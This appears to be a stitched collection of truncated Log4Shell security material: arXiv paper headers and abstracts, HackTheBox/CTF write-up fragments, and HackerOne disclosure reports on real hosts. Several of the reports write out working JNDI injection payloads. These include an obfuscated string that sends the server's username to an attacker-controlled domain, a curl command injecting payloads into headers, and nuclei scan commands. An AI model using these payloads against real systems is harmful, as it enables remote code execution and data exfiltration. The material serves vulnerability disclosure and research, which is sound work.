Hamburg University of Technology
Hamburg
Germany
[email protected]
Emanuele Iannone
0000-0001-7489-9969
Hamburg University of Technology
Hamburg
Germany
[email protected]
Maria Camporese
0009-0009-1178-0210
University of Trento
Trento
Italy
[email protected]
Torge Hinrichs
0000-0001-7489-3540
Hamburg University of Technology
Hamburg
Germany
[email protected]
Catherine Tony
0000-0002-9916-4456
Hamburg University of Technology
Hamburg
Germany
[email protected]
László Tóth
University of Szeged
Szeged
Hungary
[email protected]
Fabio Palomba
0000-0001-9337-5116
University of Salerno
Salerno
Italy
[email protected]
Péter Hegedűs
00
arXiv
Unraveling Log4Shell: Analyzing the Impact and Response to the Log4j Vulnerabil
arxiv_fulltext·2025-01-29
Unraveling Log4Shell: Analyzing the Impact and Response to the Log4j Vulnerabil
Unraveling Log4Shell: Analyzing the Impact and Response to the Log4j Vulnerability
John Doll,
Carson McCarthy,
Hannah McDougall,
Suman Bhunia
Department of Computer Science and Software Engineering, Miami University, Oxford, Ohio, USA
Email: \dolljm, mccar130, mcdoughn, bhunias\@miamioh.edu
## Abstract
The realm of technology frequently confronts threats posed by adversaries exploiting loopholes in programs. Among these, the Log4Shell vulnerability in the Log4j library stands out due to its widespread impact. Log4j, a prevalent software library for log recording, is integrated into millions of devices worldwide. The Log4Shell vulnerability facilitates remote code execution with relative ease. Its combination with the extensive utilization of Log4j marks it as one of the most dangerous
arXiv
ZTD_(JAVA): Mitigating Software Supply Chain Vulnerabilities via Zero-Trust Dependencies
arxiv_fulltext·2024-12-20
ZTD_(JAVA): Mitigating Software Supply Chain Vulnerabilities via Zero-Trust Dependencies
Mitigating Java Supply Chain Exploits with a Runtime Permission Model
: Preventing Java Supply Chain RCE Exploits via a Usable Package-level Permission Manager
: Preventing the next Log4Shell in Java with a Supply-chain Aware Permission Manager
Preventing Supply Chain Vulnerabilities in Java with a Fine-Grained Permission Manager
A Supply-Chain-Aware Sandbox Design for Supply Chain Vulnerability Defense
Enabling Component-level Sandboxing for Supply Chain Vulnerability Defense
A Component-level Sandbox Design for Runtime Supply Chain Vulnerability Defense
Enabling a for Mitigating Software Supply Chain Vulnerability Exploitation
Enabling a for Mitigating Software Supply Chain Vulnerability Exploitation in Java
: Enabling a for Mitigating Software Supply Chain Vulnerability Exploitation in
arXiv
Efficacy of EPSS in High Severity CVEs found in KEV
arxiv_fulltext·2024-11-04
Efficacy of EPSS in High Severity CVEs found in KEV
empty
empty
24pt
10pt plus 1.0pt minus 2.0pt
## Abstract
The Exploit Prediction Scoring System (EPSS) is designed to assess the probability of a vulnerability being exploited in the next 30 days relative to other vulnerabilities. The latest version, based on a research paper published in arXiv , assists defenders in deciding which vulnerabilities to prioritize for remediation. This study evaluates EPSS's ability to predict exploitation before vulnerabilities are actively compromised, focusing on high severity CVEs that are known to have been exploited and included in the CISA KEV catalog. By analyzing EPSS score history, the availability and simplicity of exploits, the system's purpose, its value as a target for Threat Actors (TAs), this paper examines EPSS's potential and identifies ar
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath*
University of Adelaide, Australia
[email protected]
Hussain Ahmad* *Authors contributed equally to this work. Corresponding author.
University of Adelaide, Australia
[email protected]
Diksha Goel
CSIRO's Data61, Australia
[email protected]
3cmMuhammad Shuja Syed
3cmSLB, USA
[email protected]
Faheem Ullah
University of Adelaide, Australia
[email protected]
plain
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
arXiv
SBOM.EXE: Countering Dynamic Code Injection based on Software Bill of Materials in Java
arxiv_fulltext·2024-06-28
SBOM.EXE: Countering Dynamic Code Injection based on Software Bill of Materials in Java
: Countering Dynamic Code Injection based on Software Bill of Materials in Java
Aman Sharma,
Martin Wittlinger,
Benoit Baudry,
Martin Monperrus
A. Sharma and M. Monperrus are with the KTH Royal Institute of Technology, Stockholm, Sweden
Email: \amansha, monperrus\@kth.se
M. Wittlinger is with the HDI Group, Cologne, Germany
Email: [email protected]
B. Baudry is with the Universtit\'e de Montr\'eal, Montr\'eal, Canada
Email: [email protected]
## Abstract
Software supply chain attacks have become a significant threat as software development increasingly relies on contributions from multiple, often unverified sources.
The code from unverified sources does not pose a threat until it is executed.
Log4Shell is a recent example of a supply chain attack that processed a ma
arXiv
Security Vulnerability Detection with Multitask Self-Instructed Fine-Tuning of Large Language Models
arxiv_fulltext·2024-06-09
Security Vulnerability Detection with Multitask Self-Instructed Fine-Tuning of Large Language Models
Security Vulnerability Detection with Multitask Self-Instructed Fine-Tuning of Large Language Models
Aidan Z.H. Yang
[email protected]
Carnegie Mellon University
Pittsburgh
United States
Haoye Tian
[email protected]
University of Melbourne
Melbourne
Australia
He Ye
[email protected]
Carnegie Mellon University
Pittsburgh
United States
Ruben Martins
[email protected]
Carnegie Mellon University
Pittsburgh
United States
Claire Le Goues
[email protected]
Carnegie Mellon University
Pittsburgh
United States
## Abstract
Software security vulnerabilities allow attackers to perform malicious activities to disrupt software operations. Recent Transformer-based language models have significantly advanced vulnerability detection, surpassing the capabilities of static analysis based deep lear
arXiv
Model-Driven Security Analysis of Self-Sovereign Identity Systems
arxiv_fulltext·2024-06-02
Model-Driven Security Analysis of Self-Sovereign Identity Systems
## Abstract
Best practices of self-sovereign identity (SSI) are being intensively explored in academia and industry. Reusable solutions obtained from best practices are generalized as architectural patterns for systematic analysis and design reference, which significantly boosts productivity and increases the dependability of future implementations. For security-sensitive projects, architects make architectural decisions with careful consideration of security issues and solutions based on formal analysis and experiment results. In this paper, we propose a model-driven security analysis framework for analyzing architectural patterns of SSI systems with respect to a threat model built on our investigation of real-world security concerns. Our framework mechanizes a modeling language to forma
arXiv
Free Proxies Unmasked: A Vulnerability and Longitudinal Analysis of Free Proxy Services
arxiv_fulltext·2024-03-04
Free Proxies Unmasked: A Vulnerability and Longitudinal Analysis of Free Proxy Services
cyanrgb0.4,1,1
orangergb1,0.7,0
dkgreenrgb0,0.6,0
grayrgb0.5,0.5,0.5
purplergb0.58,0,0.82
[3]#1#2: #3
[1]redTODO: #1
redREFS
[1]brownAntoine#1
[1]orangePierre#1
[1]magentaNaif#1
[1]purpleWalter#1
[1]dkgreen#1
[1]orange#1
[1]red#1
[1]#1
[1]#1
[1]#1
[1]3pt plus 1pt minus 1pt #1.75em minus .5em
et al.
i.e.,\
e.g.,\
black!60whiteRedacted
Datadome
Free Proxies Unmasked: A Vulnerability and Longitudinal Analysis of Free Proxy Services
Anonymous Authors*
Naif Mehanna
Univ. Lille, Inria, CNRS
[email protected]
Walter Rudametkin
Univ. Rennes, Inria,
CNRS, IRISA, IUF
[email protected]
Pierre Laperdrix
CNRS, Univ. Lille, Inria
[email protected]
Antoine Vastel
Datadome
[email protected]
\@IEEEpubidpullup6.5
7.57.5 Workshop on Measurements, Attac
arXiv
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
arxiv_fulltext·2024-02-21
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
empty
huge
IEEE Copyright Notice
huge
5mm
5mm
large
© 2024 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works.
large
5mm
large
Submitted to: IEEE SoutheastCon 2024 · March 15-17, 2024 - Westin Peachtree Plaza, Atlanta, Georgia
https://ieeesoutheastcon.org/
large
5mm
Preprint Version, February 21, 2024
5mm
L[1]> p#1
C[1]> p#1
R[1]> p#1
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
@IEEEauthorhalign
@IEEEauthorhalign
Said Varlioglu,
arXiv
Hacktivism Goes Orbital: Investigating NB65's Breach of ROSCOSMOS
arxiv_fulltext·2024-02-15
Hacktivism Goes Orbital: Investigating NB65's Breach of ROSCOSMOS
## Abstract
In March of 2022, Network battalion 65 (NB65), a hacktivist affiliate of Anonymous, publicly asserted its successful breach of ROSCOSMOS's satellite imaging capabilities in response to Russia's invasion of Ukraine. NB65 disseminated a series of primary sources as substantiation, proclaiming the incapacitation of ROSCOSMOS's space-based vehicle monitoring system and doxing of related proprietary documentation. Despite the profound implications of hacktivist incursions into the space sector, the event has garnered limited attention due to the obscurity of technical attack vectors and ROCOSMOS's denial of NB65's allegations. Through analysis of NB65's released primary sources of evidence, this paper uncovers the probable vulnerabilities and exploits that enabled the alleged breac
arXiv
On the Effectiveness of Function-Level Vulnerability Detectors for Inter-Procedural Vulnerabilities
arxiv_fulltext·2024-01-20
On the Effectiveness of Function-Level Vulnerability Detectors for Inter-Procedural Vulnerabilities
On the Effectiveness of Function-Level Vulnerability Detectors for Inter-Procedural Vulnerabilities
Zhen Li
National Engineering Research Center for Big Data Technology and System, Services Computing Technology and System Lab, Hubei Key Laboratory of Distributed System Security, Hubei Engineering Research Center on Big Data Security, Cluster and Grid Computing Lab
JinYinHu Laboratory, Wuhan, China
School of Cyber Science and Engineering, Huazhong University of Science and Technology
Wuhan
China
[email protected]
Ning Wang
[1]
School of Cyber Science and Engineering, Huazhong University of Science and Technology
Wuhan
China
[email protected]
Deqing Zou
[1]
[2]
Corresponding author
School of Cyber Science and Engineering, Huazhong University of Science and Technology
Wuhan
China
d
arXiv
PPT4J: Patch Presence Test for Java Binaries
arxiv_fulltext·2024-01-15
PPT4J: Patch Presence Test for Java Binaries
## Abstract
The number of vulnerabilities reported in open source software has increased substantially in recent years. Security patches provide the necessary measures to protect software from attacks and vulnerabilities. In practice, it is difficult to identify whether patches have been integrated into software, especially if we only have binary files. Therefore, the ability to test whether a patch is applied to the target binary, a.k.a. patch presence test, is crucial for practitioners. However, it is challenging to obtain accurate semantic information from patches, which could lead to incorrect results.
In this paper, we propose a new patch presence test framework named ( ). is designed for open-source Java libraries. It takes Java binaries (i.e. bytecode files) as input, extracts sem
arXiv
Evaluating the Security and Privacy Risk Postures of Virtual Assistants
arxiv_fulltext·2023-12-22
Evaluating the Security and Privacy Risk Postures of Virtual Assistants
Evaluating the Security and Privacy Risk Postures of Virtual Assistants
Borna Kalhor1, Sanchari Das2
1Department of Computer Engineering, Ferdowsi University of Mashhad, Mashhad, Iran
2Department of Computer Science, University of Denver, Denver, Colorado, USA
[email protected], [email protected]
Virtual Assistants, Privacy and Security, Vulnerability Analysis, Voice Assistants, Security Evaluation.
Virtual assistants (VAs) have seen increased use in recent years due to their ease of use for daily tasks. Despite their growing prevalence, their security and privacy implications are still not well understood. To address this gap, we conducted a study to evaluate the security and privacy postures of eight widely used voice assistants: Alexa, Braina, Cortana, Google Assistant, Ka
arXiv
NODLINK: An Online System for Fine-Grained APT Attack Detection and Investigation
arxiv_fulltext·2023-11-04
NODLINK: An Online System for Fine-Grained APT Attack Detection and Investigation
: An Online System for Fine-Grained APT Attack Detection and Investigation
Shaofei Li2,
Feng Dong3,
Xusheng Xiao4,
Haoyu Wang3,
Fei Shao5,
Jiedong Chen6, Yao Guo2,
Xiangqun Chen2, and Ding Li* is the corresponding author.21
2Key Laboratory of High-Confidence Software Technologies (MOE), School of Computer Science, Peking University
3Huazhong University of Science and Technology7 7 Hubei Key Laboratory of Distributed System Security, Hubei Engineering Research Center on Big Data Security, School of Cyber Science and Engineering, Huazhong University of Science and Technology., 4Arizona State University
5Case Western Reserve University, 6Sangfor Technologies Inc.
2\lishaofei, ding_li, yaoguo, cherry\@pku.edu.cn, 3\dongfeng, haoyuwang\@hust.edu.cn
[email protected], [email protected], 6che
arXiv
Cloud Watching: Understanding Attacks Against Cloud-Hosted Services
arxiv_fulltext·2023-09-28
Cloud Watching: Understanding Attacks Against Cloud-Hosted Services
CCSXML
10003033
Networks
500
10002978.10003014
Security and privacy Network security
500
10002978.10002997.10002999
Security and privacy Intrusion detection systems
300
CCSXML
[500]Networks
[500]Security and privacy Network security
[300]Security and privacy Intrusion detection systems
cloud, security, honeypot, darknet, scanning
## Abstract
Cloud computing has dramatically changed service deployment patterns. In this work, we analyze how
attackers identify and target cloud services in contrast to traditional enterprise networks and network telescopes. Using a diverse set of cloud honeypots in 5 providers and 23 countries as well as 2 educational networks and 1 network telescope, we analyze how IP address assignment, geography, network, and service-port selection, influence what
arXiv
Security in Online Freelance Software Development: A case for Distributed Security Responsibility
arxiv_fulltext·2023-07-12
Security in Online Freelance Software Development: A case for Distributed Security Responsibility
Security in Online Freelance Software Development: A case for Distributed Security Responsibility
Irum Rauf, Tamara Lopez, Thein Tun,
Marian Petre
The Open University, Milton Keynes, UK
[email protected]
Bashar Nuseibeh
The Open University, UK
Lero, Republic of Ireland
[email protected]
## Abstract
Secure software is a cornerstone to safe and resilient digital ecosystems. It offers strong foundation to protect users' sensitive data and guard against cyber-threats. The rapidly increasing landscape of digital economy has encouraged developers from different socio-technical and socio-economic backgrounds to join online freelance marketplaces. While, secure software practices facilitate software developers in developing secure software, there is paucity of resear
arXiv
Beyond the Surface: Investigating Malicious CVE Proof of Concept Exploits on GitHub
arxiv_fulltext·2023-06-07
Beyond the Surface: Investigating Malicious CVE Proof of Concept Exploits on GitHub
Beyond the Surface: Investigating Malicious CVE Proof of Concept Exploits on GitHub
Soufian El Yadmani, Robin The, Olga Gadyatskaya
Leiden Institute of Advanced Computer Science, Leiden University
## Abstract
\
Exploit proof-of-concepts (PoCs) for known vulnerabilities are widely shared in the security community. They help security analysts to learn from each other and they facilitate security assessments and red teaming tasks. In the recent years, PoCs have been widely distributed, e.g., via dedicated websites and platforms, and public code repositories such as GitHub. However, there is no guarantee that PoCs in public code repositories come from trustworthy sources or even that they do what they are supposed to do.
In this work we investigate GitHub-hosted PoCs for known vulnerabili
arXiv
ICSML: Industrial Control Systems ML Framework for native inference using IEC 61131-3 code
arxiv_fulltext·2023-04-21
ICSML: Industrial Control Systems ML Framework for native inference using IEC 61131-3 code
codestyle
[ICSML: Industrial Control Systems Machine Learning Inference Framework]ICSML: Industrial Control Systems ML Framework for native inference using IEC 61131-3 code
Constantine Doumanidis
New York University Abu Dhabi
Abu Dhabi
UAE
[email protected]
Prashant Hari Narayan Rajput
NYU Tandon School of Engineering
Brooklyn
New York
USA
[email protected]
Michail Maniatakos
New York University Abu Dhabi
Abu Dhabi
UAE
[email protected]
## Abstract
Industrial Control Systems (ICS) have played a catalytic role in enabling the 4th Industrial Revolution. ICS devices like Programmable Logic Controllers (PLCs), automate, monitor, and control critical processes in industrial, energy, and commercial environments. The convergence of traditional Operational T
arXiv
Detecting Security Patches via Behavioral Data in Code Repositories
arxiv_fulltext·2023-02-04
Detecting Security Patches via Behavioral Data in Code Repositories
## Abstract
The absolute majority of software today is developed collaboratively using collaborative version control tools such as Git. It is a common practice that once a vulnerability is detected and fixed, the developers behind the software issue a Common Vulnerabilities and Exposures or CVE record to alert the user community of the security hazard and urge them to integrate the security patch.
However, some companies might not disclose their vulnerabilities and just update their repository. As a result, users are unaware of the vulnerability and may remain exposed.
In this paper, we present a system to automatically identify security patches using only the developer behavior in the Git repository without analyzing the code itself or the remarks that accompanied the fix (commit messag
CTF
Woodcutter / README
ctf_writeups·2023·CVSS 10.0
[CRITICAL] Woodcutter / README
# Woodcutter
> Once upon a time in a quiet forest village, lived a woodcutter named Tom known for his exceptional axe skills. A stranger named Mr. Smith, a software engineer, approached Tom, seeking wood for his Java project, unknowingly sparking an unlikely adventure at the intersection of nature and technology.
## About the Challenge
We were given a website that uses `Unifi Network` version `6.4.54`
## How to Solve?
Because of the website is using older version of the Unifi network, I immediately searched on Google using the following keyword
```
Unifi 6.4.54 exploit
```
It appears that this version is vulnerable to the Log4j vulnerability (CVE-2021-44228). To exploit the website, I am using this [GitHub Repository](https://github.com/puzzlepeaches/Log4jUnifi) to perform a reverse
arXiv
VulCurator: A Vulnerability-Fixing Commit Detector
arxiv_fulltext·2022-09-07
VulCurator: A Vulnerability-Fixing Commit Detector
[: A Vulnerability-Fixing Commit Detector]: A Vulnerability-Fixing Commit Detector
Truong-Giang Nguyen
Singapore Management University
Singapore
Singapore
[email protected]
Thanh Le-Cong
Singapore Management University
Singapore
Singapore
[email protected]
Hong Jin Kang
Singapore Management University
Singapore
Singapore
[email protected]
Xuan-Bach D. Le
University of Melbourne
Melbourne
Australia
[email protected]
David Lo
Singapore Management University
Singapore
Singapore
[email protected]
[1]red #1
[1]blue Bach : #1
[1]blue HJ : #1
acmlicensed
15.00
10.1145/3540250.3558936
2022
2022
fse22demo-p103-p
978-1-4503-9413-0/22/11
[ESEC/FSE '22]Proceedings of the 30th ACM Joint European Software Engineering Conference and Symposium on the Foundations of Sof
arXiv
Threat Assessment in Machine Learning based Systems
arxiv_fulltext·2022-06-30
Threat Assessment in Machine Learning based Systems
Threat Assessment in Machine Learning based Systems
Lionel Nganyewou Tidjon and Foutse Khomh, Senior Member, IEEE
The authors are with Polytechnique Montréal, Montréal, QC H3C 3A7, Canada.
E-mail: \lionel.tidjon, foutse.khomh\@polymtl.ca
## Abstract
Machine learning is a field of artificial intelligence (AI) that is becoming essential for several critical systems, making it a good target for threat actors. Threat actors exploit different Tactics, Techniques, and Procedures (TTPs) against the confidentiality, integrity, and availability of Machine Learning (ML) systems.
During the ML
cycle, they exploit adversarial TTPs to poison data and fool ML-based systems. In recent years, multiple security practices have been proposed for traditional systems but they are not enough to cope with th
arXiv
Current Challenges of Cyber Threat and Vulnerability Identification Using Public Enumerations
arxiv_fulltext·2022-06-29
Current Challenges of Cyber Threat and Vulnerability Identification Using Public Enumerations
[Current Challenges of Cyber Threat and Vulnerability Identification Using Public Enumerations]Current Challenges of Cyber Threat and Vulnerability Identification Using Public Enumerations
Lukáš Sadlek
Masaryk University
Brno
Czech Republic
[email protected]
0000-0003-2577-6633
Pavel Celeda
Masaryk University
Brno
Czech Republic
[email protected]
0000-0002-3338-2856
Daniel Tovarn\'ak
Masaryk University
Brno
Czech Republic
[email protected]
0000-0002-7206-5167
L. Sadlek et al.
## Abstract
Identification of cyber threats is one of the essential tasks for security teams. Currently, cyber threats can be identified using knowledge organized into various formats, enumerations, and knowledge bases.
This paper studies the current challenges of identifying vulnerabilities and thre
arXiv
Attack Techniques and Threat Identification for Vulnerabilities
arxiv_fulltext·2022-06-22
Attack Techniques and Threat Identification for Vulnerabilities
Attack Techniques and Threat Identification for Vulnerabilities
Constantin Adam
Muhammed Fatih Bulut
Daby Sow
cmadam, mfbulut, [email protected]
IBM T.J. Watson Research Center
Yorktown Heights
NY
USA
Steven Ocepek
Chris Bedell
steve.ocepek, [email protected]
IBM Security X-Force Red
USA
Lilian Ngweta
[email protected]
Rensselaer Polytechnic Institute
Troy
NY
USA
Adam and Bulut, et al.
## Abstract
Modern organizations struggle with what is often considered an insurmountable number of vulnerabilities that are discovered and reported by their network and application vulnerability scanners. Therefore, prioritization and focus become critical, to spend their limited time on the highest risk vulnerabilities. In doing this, it is important for these organizations not only to
arXiv
The Race to the Vulnerable: Measuring the Log4j Shell Incident
arxiv_fulltext·2022-06-07
The Race to the Vulnerable: Measuring the Log4j Shell Incident
IEEEexample:BSTcontrolNew
5pt
textblock0.8(0.1,0.02)
If you cite this paper, please use the TMA reference:
R. Hiesgen, M. Nawrocki, T. C. Schmidt, and M. Wählisch.
2022. The Race to the Vulnerable: Measuring the Log4j Shell Incident.
In Proc. of Network Traffic Measurement and Analysis Conference (TMA ’22).
IFIP, 9 pages.
textblock
The Race to the Vulnerable:
Measuring the Log4j Shell Incident
Raphael Hiesgen
HAW Hamburg\ [email protected]
Marcin Nawrocki
Freie Universit\"at Berlin\ [email protected]
Thomas C. Schmidt
HAW Hamburg\ [email protected]
Matthias W\"ahlisch
Freie Universit\"at Berlin\ [email protected]
## Abstract
The critical remote-code-execution (RCE) Log4Shell is a severe vulnerability that was disclosed to the public on December 10, 2021. It
arXiv
The Dangerous Combo: Fileless Malware and Cryptojacking
arxiv_fulltext·2022-03-09
The Dangerous Combo: Fileless Malware and Cryptojacking
empty
huge
IEEE Copyright Notice
huge
5mm
5mm
large
© 2022 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works.
large
5mm
large
Accepted to be published in: SoutheastCon 2022 IEEE Region 3 Technical, Professional, and Student Conference. Mobile, Alabama, USA. Mar 31st to Apr 03rd 2022. https://ieeesoutheastcon.org/
large
5mm
L[1]> p#1
C[1]> p#1
R[1]> p#1
arabic
The Dangerous Combo: Fileless Malware and Cryptojacking
@IEEEauthorhalign
@IEEEauthorhalign
Said Va
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Crafty / README
ctf_writeups·CVSS 10.0
CVE-2021-44228 [CRITICAL] Crafty / README
# Crafty - HackTheBox - Writeup
Windows, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find port `80` and `25565`.
***User***: Discovered a `Minecraft` server. Exploited CVE-2021-44228 (log4shell) to achieve Remote Code Execution (RCE) on the `Minecraft` server. Leveraged the exploit to establish a reverse shell as `svc_minecraft`.
***Root***: Identified a Minecraft plugin containing the `Administrator` credentials. Utilized a PowerShell script ([runas.ps1](./runas.ps1)) to obtain the root flag as `Administrator`.
## Crafty Solution
### User
Let's begin by using `nmap` to scan the target machine:
```console
┌─[evyatar9@parrot]─[/hackthebox/Crafty]
└──╼ $ nmap -sV -sC -oA nmap/Crafty 10.10.11.249
Starting
CTF
README
ctf_writeups
README
# CTF Writeups
Welcome to my CTF Writeups repository! Here, I document the solutions and methodologies used to solve various Capture The Flag (CTF) challenges. This repository is intended to serve as a learning resource for others interested in cybersecurity and CTF competitions.
Capture The Flag (CTF) competitions are a popular way to practice and improve cybersecurity skills. These competitions present various challenges that require problem-solving, creativity, and technical knowledge.
## Writeups
The writeups in this repository (located in the "writeups" folder) are categorised based on the nature of the challenge. Each writeup provides step-by-step solutions, along with explanations of the tools and techniques used. The difficulty rating associated with each challenge matches the dif
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
HackerOne
[forum.acronis.com] JNDI Code Injection due an outdated log4j component
hackerone·2024-08-28·CVSS 10.0
CVE-2021-44228 [CRITICAL] [forum.acronis.com] JNDI Code Injection due an outdated log4j component
[forum.acronis.com] JNDI Code Injection due an outdated log4j component
## Summary
Hi team,
It seems that the machine is affected by the latest CVE-2021-44228 which grants any authenticated user command execution. The vulnerability affects the remote asset forum.acronis.com and this issue allows to remote attackers to perfom Remote Code Execution via JNDI exfiltration.
## Steps To Reproduce
Vulnerable request is: `https://forum.acronis.com/search?s=${j${main:\k5:-Nd}i${spring:k5:-:}ldap://${sys:user.name}-04363f1f3427b48.test3.ggdd.co.uk/}`.
Which generates a pingback exfiltrating the information to my controlled server `ggdd.co.uk`:
{F1551515}
We can see that the system username is `solr`.
## Recommendations
Upgrade Log4j to latest version, 2.1.17.
## Impact
Remote OS command
HackerOne
[CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com
hackerone·2024-08-28·CVSS 10.0
CVE-2021-44228 [CRITICAL] [CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com
[CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com
### Description
The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned [CVE-2021-44228](https://www.randori.com/blog/cve-2021-44228/).
### Reproduction Steps
For easier reproduction, please use Burp Collaborator and issue the following curl command with your collaborator instance URL;
```bash
curl --http1.1 --silent --output /dev/null \
--header 'User-agent: ${jndi:ldap://${hostName}./a}' \
--header 'X-Forwarded-For: ${jndi:ldap://${hostName}./a}' \
--header 'Referer: ${jndi:ldap://${hostName}./a}' \
https://ng01-cloud.acronis.com
```
You should receive a request to your Collaborator Client with your server's hos
HackerOne
Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
hackerone·2024-08-24·CVSS 10.0
CVE-2021-44228 [CRITICAL] Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
###Summary
Hello,
I would to like report this security flaw on https://mymtn.mtncongo.net. Using script nuclei i can found CVE-2021-44228. This is a critical issue cause as remote command execution. On my test i just retrive hostname of machine via nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)
###Steps To Reproduce
How we can reproduce the issue;
1. run nuclei script via cmd; ./nuclei -u https://mymtn.mtncongo.net:8443 -t ../nuclei-templates/cves/2021/CVE-2021-44228.yaml
It will retrive the hostname of machine on output " [net]"
Like this;
````
[2021-12-14 03:38:05] [CVE-2021-44228] [http] [critical] https://mymtn.mtncongo.net:8443/?x=${jndi
HackerOne
Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228
hackerone·2024-08-24·CVSS 10.0
CVE-2021-44228 [CRITICAL] Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228
Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228
###Summary
Hello,
I would to like report this security flaw on http://mtn1app.mtncameroon.net . Using script nuclei i can found CVE-2021-44228. This is a critical issue cause as remote command execution. On my test i just retrive hostname of machine via nuclei script. (https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)
###Steps To Reproduce
How we can reproduce the issue;
1. run nuclei script via cmd; ./nuclei -u http://mtn1app.mtncameroon.net:8080/ -t ../nuclei-templates/cves/2021/CVE-2021-44228.yaml
It will retrive the hostname of machine on output " lastic-co1-nodes1.mtnnigeria.net"
Like this;
````
http://mtn1app.mtncameroon.net:8080/?x=${jndi:ldap://${ho
HackerOne
LOGJ4 VUlnerability [HtUS]
hackerone·2022-11-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] LOGJ4 VUlnerability [HtUS]
LOGJ4 VUlnerability [HtUS]
**Description:**
Hi team,
log4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable
**Impact**
RCE
**System Host(s)**
██████
**Affected Product(s) and Version(s)**
**CVE Numbers**
CVE-2021-44228
**Steps to Reproduce**
1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
2. paste the poc code on parameter
3. Then burp collaborator received reverse ping back
Photos below
**POC CODE**
${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
**Suggested Mitigation/Remediation Actions**
https://www.lunasec.io/docs/blog/log4j-zero-day/
## Impact
Successful attack leads Arbitary Code Execution on the application
HackerOne
[CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
hackerone·2022-07-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
[CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
## Summary
The website at nps.acronis.com is vulnerable to CVE-2021-44228
## Steps To Reproduce
I used this [script](https://github.com/fullhunt/log4j-scan) to find this. It spins up an interact-sh server to receive the callback and send the payload in the query string and about 30 diffent headers. You can reproduce manually with curl and interact-sh/burp collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them.
1. Construct the payload: `${jdni:ldap://nps.acronis.com./test}`
1. Inject the payload in the Request Headers (User Agent, X-Fo
HackerOne
███ ████████ running a vulnerable log4j
hackerone·2022-01-19·CVSS 10.0
CVE-2021-44228 [CRITICAL] ███ ████████ running a vulnerable log4j
███ ████████ running a vulnerable log4j
#Report
**Description:**
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
## Impact
Probably arbitrary code execution
## System Host(s)
███████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Browse to https://██████████/█████████https%3A%2F%2F███%2F
2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field
3. Enter a random password
4. Submit
Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.
## Suggested Mitigation/Remediation Actions
Update log4j or disable jndi support.
#Activity Timeline
2021-12-10 18:16 (-0600) (comment)
